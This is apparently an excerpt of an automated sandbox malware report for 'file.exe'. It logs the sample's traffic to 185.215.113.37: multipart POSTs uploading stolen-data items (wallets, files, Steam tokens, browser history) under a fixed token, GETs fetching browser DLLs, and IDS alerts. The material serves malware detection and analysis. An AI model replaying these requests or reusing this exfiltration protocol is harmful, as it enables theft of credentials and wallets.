Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFCHost: 185.215.113.37Content-Length: 1451Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 64 38 34 37 61 64 30 36 63 31 66 33 30 32 63 61 30 63 65 38 31 61 37 62 61 39 35 62 37 39 37 64 63 62 38 30 62 36 30 39 36 35 32 62 35 65 35 66 61 64 30 38 36 35 65 34 65 37 65 65 66 33 35 36 30 31 31 63 31 30 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 61 47 6c 7a 64 47 39 79 65 56 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 61 48 52 30 63 48 4d 36 4c 79 39 6e 62 79 35 74 61 57 4e 79 62 33 4e 76 5a 6e 51 75 59 32 39 74 4c 32 5a 33 62 47 6c 75 61 79 38 2f 54 47 6c 75 61 30 6c 6b 50 54 49 78 4d 44 59 79 4e 44 4d 4b 61 48 52 30 63 48 4d 36 4c 79 39 6e 62 79 35 74 61 57 4e 79 62 33 4e 76 5a 6e 51 75 59 32 39 74 4c 32 5a 33 62 47 6c 75 61 79 38 2f 62 47 6c 75 61 32 6c 6b 50 54 67 31 4d 54 55 30 4e 67 70 6f 64 48 52 77 63 7a 6f 76 4c 33 4e 31 63 48 42 76 63 6e 51 75 62 57 6c 6a 63 6d 39 7a 62 32 5a 30 4c 6d 4e 76 62 53 39 6c 62 69 31 31 63 79 39 76 5a 6d 5a 70 59 32 55 76 4e 32 51 30 4f 44 49 34 4e 57 49 74 4d 6a 42 6c 4f 43 30 30 59 6a 6c 69 4c 54 6b 78 59 57 51 74 4d 6a 45 32 5a 54 4d 30 4d 54 59 7a 59 6d 46 6b 50 33 64 30 4c 6d 31 6a 58 32 6c 6b 50 57 56 75 64 47 56 79 63 47 73 79 4d 44 45 32 4a 6e 56 70 50 57 56 75 4c 58 56 7a 4a 6e 4a 7a 50 57 56 75 4c 58 56 7a 4a 6d 46 6b 50 58 56 7a 43 6d 68 30 64 48 42 7a 4f 69 38 76 63 33 56 77 63 47 39 79 64 43 35 74 61 57 4e 79 62 33 4e 76 5a 6e 51 75 59 32 39 74 4c 32 56 75 4c 58 56 7a 4c 32 39 6d 5a 6d 6c 6a 5a 53 38 35 4e 47 4a 68 4d 6d 55 77 59 69 30 32 4d 7a 68 6c 4c 54 52 68 4f 54 49 74 4f 44 67 31 4e 79 30 79 59 32 49 31 59 57 4d 78 5a 44 68 6c 4d 54 63 2f 64 57 6b 39 5a 57 34 74 64 58 4d 6d 63 6e 4d 39 5a 57 34 74 64 58 4d 6d 59 57 51 39 64 58 4d 4b 61 48 52 30 63 48 4d 36 4c 79 39 7a 64 58 42 77 62 33 4a 30 4c 6d 31 70 59 33 4a 76 63 32 39 6d 64 43 35 6a 62 32 30 76 5a 57 34 74 64 58 4d 76 62 32 5a 6d 61 57 4e 6c 4c 32 56 34 59 57 31 77 62 47 56 7a 4c 57 39 6d 4c 57 39 6d 5a 6d 6c 6a 5a 53 31 77 63 6d 39 6b 64 57 4e 30 4c 57 74 6c 65 58 4d 74 4e 32 51 30 4f 44 49 34 4e 57 49 74 4d 6a 42 6c 4f 43 30 30 59 6a 6c 69 4c 54 6b 78 59 57 51 74 4d 6a 45 32 5a 54 4d 30 4d 54 59 7a 59 6d 46
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFCHost: 185.215.113.37Content-Length: 1451Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 64 38 34 37 61 64 30 36 63 31 66 33 30 32 63 61 30 63 65 38 31 61 37 62 61 39 35 62 37 39 37 64 63 62 38 30 62 36 30 39 36 35 32 62 35 65 35 66 61 64 30 38 36 35 65 34 65 37 65 65 66 33 35 36 30 31 31 63 31 30 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 61 47 6c 7a 64 47 39 79 65 56 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 61 48 52 30 63 48 4d 36 4c 79 39 6e 62 79 35 74 61 57 4e 79 62 33 4e 76 5a 6e 51 75 59 32 39 74 4c 32 5a 33 62 47 6c 75 61 79 38 2f 54 47 6c 75 61 30 6c 6b 50 54 49 78 4d 44 59 79 4e 44 4d 4b 61 48 52 30 63 48 4d 36 4c 79 39 6e 62 79 35 74 61 57 4e 79 62 33 4e 76 5a 6e 51 75 59 32 39 74 4c 32 5a 33 62 47 6c 75 61 79 38 2f 62 47 6c 75 61 32 6c 6b 50 54 67 31 4d 54 55 30 4e 67 70 6f 64 48 52 77 63 7a 6f 76 4c 33 4e 31 63 48 42 76 63 6e 51 75 62 57 6c 6a 63 6d 39 7a 62 32 5a 30 4c 6d 4e 76 62 53 39 6c 62 69 31 31 63 79 39 76 5a 6d 5a 70 59 32 55 76 4e 32 51 30 4f 44 49 34 4e 57 49 74 4d 6a 42 6c 4f 43 30 30 59 6a 6c 69 4c 54 6b 78 59 57 51 74 4d 6a 45 32 5a 54 4d 30 4d 54 59 7a 59 6d 46 6b 50 33 64 30 4c 6d 31 6a 58 32 6c 6b 50 57 56 75 64 47 56 79 63 47 73 79 4d 44 45 32 4a 6e 56 70 50 57 56 75 4c 58 56 7a 4a 6e 4a 7a 50 57 56 75 4c 58 56 7a 4a 6d 46 6b 50 58 56 7a 43 6d 68 30 64 48 42 7a 4f 69 38 76 63 33 56 77 63 47 39 79 64 43 35 74 61 57 4e 79 62 33 4e 76 5a 6e 51 75 59 32 39 74 4c 32 56 75 4c 58 56 7a 4c 32 39 6d 5a 6d 6c 6a 5a 53 38 35 4e 47 4a 68 4d 6d 55 77 59 69 30 32 4d 7a 68 6c 4c 54 52 68 4f 54 49 74 4f 44 67 31 4e 79 30 79 59 32 49 31 59 57 4d 78 5a 44 68 6c 4d 54 63 2f 64 57 6b 39 5a 57 34 74 64 58 4d 6d 63 6e 4d 39 5a 57 34 74 64 58 4d 6d 59 57 51 39 64 58 4d 4b 61 48 52 30 63 48 4d 36 4c 79 39 7a 64 58 42 77 62 33 4a 30 4c 6d 31 70 59 33 4a 76 63 32 39 6d 64 43 35 6a 62 32 30 76 5a 57 34 74 64 58 4d 76 62 32 5a 6d 61 57 4e 6c 4c 32 56 34 59 57 31 77 62 47 56 7a 4c 57 39 6d 4c 57 39 6d 5a 6d 6c 6a 5a 53 31 77 63 6d 39 6b 64 57 4e 30 4c 57 74 6c 65 58 4d 74 4e 32 51 30 4f 44 49 34 4e 57 49 74 4d 6a 42 6c 4f 43 30 30 59 6a 6c 69 4c 54 6b 78 59 57 51 74 4d 6a 45 32 5a 54 4d 30 4d 54 59 7a 59 6d 46
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBFIIIEHCFHJKFHDHDAHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 64 38 34 37 61 64 30 36 63 31 66 33 30 32 63 61 30 63 65 38 31 61 37 62 61 39 35 62 37 39 37 64 63 62 38 30 62 36 30 39 36 35 32 62 35 65 35 66 61 64 30 38 36 35 65 34 65 37 65 65 66 33 35 36 30 31 31 63 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 2d 2d 0d 0a Data Ascii: ------JEBFIIIEHCFHJKFHDHDAContent-Disposition: form-data; name="token"89d847ad06c1f302ca0ce81a7ba95b797dcb80b609652b5e5fad0865e4e7eef356011c10------JEBFIIIEHCFHJKFHDHDAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JEBFIIIEHCFHJKFHDHDAContent-Disposition: form-data; name="file"------JEBFIIIEHCFHJKFHDHDA--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEBHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 45 47 43 41 45 47 49 49 49 44 48 49 45 42 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 64 38 34 37 61 64 30 36 63 31 66 33 30 32 63 61 30 63 65 38 31 61 37 62 61 39 35 62 37 39 37 64 63 62 38 30 62 36 30 39 36 35 32 62 35 65 35 66 61 64 30 38 36 35 65 34 65 37 65 65 66 33 35 36 30 31 31 63 31 30 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 47 43 41 45 47 49 49 49 44 48 49 45 42 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 47 43 41 45 47 49 49 49 44 48 49 45 42 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 47 43 41 45 47 49 49 49 44 48 49 45 42 4b 45 42 2d 2d 0d 0a Data Ascii: ------GHJEGCAEGIIIDHIEBKEBContent-Disposition: form-data; name="token"89d847ad06c1f302ca0ce81a7ba95b797dcb80b609652b5e5fad0865e4e7eef356011c10------GHJEGCAEGIIIDHIEBKEBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GHJEGCAEGIIIDHIEBKEBContent-Disposition: form-data; name="file"------GHJEGCAEGIIIDHIEBKEB--
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGIDGCAFCBKECAAKJJKHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIEGIECGCBKFIEBGCAAHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 64 38 34 37 61 64 30 36 63 31 66 33 30 32 63 61 30 63 65 38 31 61 37 62 61 39 35 62 37 39 37 64 63 62 38 30 62 36 30 39 36 35 32 62 35 65 35 66 61 64 30 38 36 35 65 34 65 37 65 65 66 33 35 36 30 31 31 63 31 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 41 2d 2d 0d 0a Data Ascii: ------AFIEGIECGCBKFIEBGCAAContent-Disposition: form-data; name="token"89d847ad06c1f302ca0ce81a7ba95b797dcb80b609652b5e5fad0865e4e7eef356011c10------AFIEGIECGCBKFIEBGCAAContent-Disposition: form-data; name="message"wallets------AFIEGIECGCBKFIEBGCAA--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFIIJDAAAAKFHIDAAAKHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 41 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 64 38 34 37 61 64 30 36 63 31 66 33 30 32 63 61 30 63 65 38 31 61 37 62 61 39 35 62 37 39 37 64 63 62 38 30 62 36 30 39 36 35 32 62 35 65 35 66 61 64 30 38 36 35 65 34 65 37 65 65 66 33 35 36 30 31 31 63 31 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 41 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 41 41 41 4b 2d 2d 0d 0a Data Ascii: ------AAFIIJDAAAAKFHIDAAAKContent-Disposition: form-data; name="token"89d847ad06c1f302ca0ce81a7ba95b797dcb80b609652b5e5fad0865e4e7eef356011c10------AAFIIJDAAAAKFHIDAAAKContent-Disposition: form-data; name="message"files------AAFIIJDAAAAKFHIDAAAK--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDBAEGIIIEBGCAAFHIHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 64 38 34 37 61 64 30 36 63 31 66 33 30 32 63 61 30 63 65 38 31 61 37 62 61 39 35 62 37 39 37 64 63 62 38 30 62 36 30 39 36 35 32 62 35 65 35 66 61 64 30 38 36 35 65 34 65 37 65 65 66 33 35 36 30 31 31 63 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 2d 2d 0d 0a Data Ascii: ------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="token"89d847ad06c1f302ca0ce81a7ba95b797dcb80b609652b5e5fad0865e4e7eef356011c10------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="file"------KEHDBAEGIIIEBGCAAFHI--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDHCAFCGDAAKEBFIJDGHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 64 38 34 37 61 64 30 36 63 31 66 33 30 32 63 61 30 63 65 38 31 61 37 62 61 39 35 62 37 39 37 64 63 62 38 30 62 36 30 39 36 35 32 62 35 65 35 66 61 64 30 38 36 35 65 34 65 37 65 65 66 33 35 36 30 31 31 63 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 2d 2d 0d 0a Data Ascii: ------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="token"89d847ad06c1f302ca0ce81a7ba95b797dcb80b609652b5e5fad0865e4e7eef356011c10------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="message"ybncbhylepme------KJDHCAFCGDAAKEBFIJDG--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFBGIJKEGIECAAFHDHHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 42 47 49 4a 4b 45 47 49 45 43 41 41 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 64 38 34 37 61 64 30 36 63 31 66 33 30 32 63 61 30 63 65 38 31 61 37 62 61 39 35 62 37 39 37 64 63 62 38 30 62 36 30 39 36 35 32 62 35 65 35 66 61 64 30 38 36 35 65 34 65 37 65 65 66 33 35 36 30 31 31 63 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 47 49 4a 4b 45 47 49 45 43 41 41 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 47 49 4a 4b 45 47 49 45 43 41 41 46 48 44 48 2d 2d 0d 0a Data Ascii: ------HDAFBGIJKEGIECAAFHDHContent-Disposition: form-data; name="token"89d847ad06c1f302ca0ce81a7ba95b797dcb80b609652b5e5fad0865e4e7eef356011c10------HDAFBGIJKEGIECAAFHDHContent-Disposition: form-data; name="message"wkkjqaiaxkhb------HDAFBGIJKEGIECAAFHDH--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.37 185.215.113.37
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49730 -> 185.215.113.37:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F60A0 InternetOpenA,StrCmpCA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_006F60A0
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
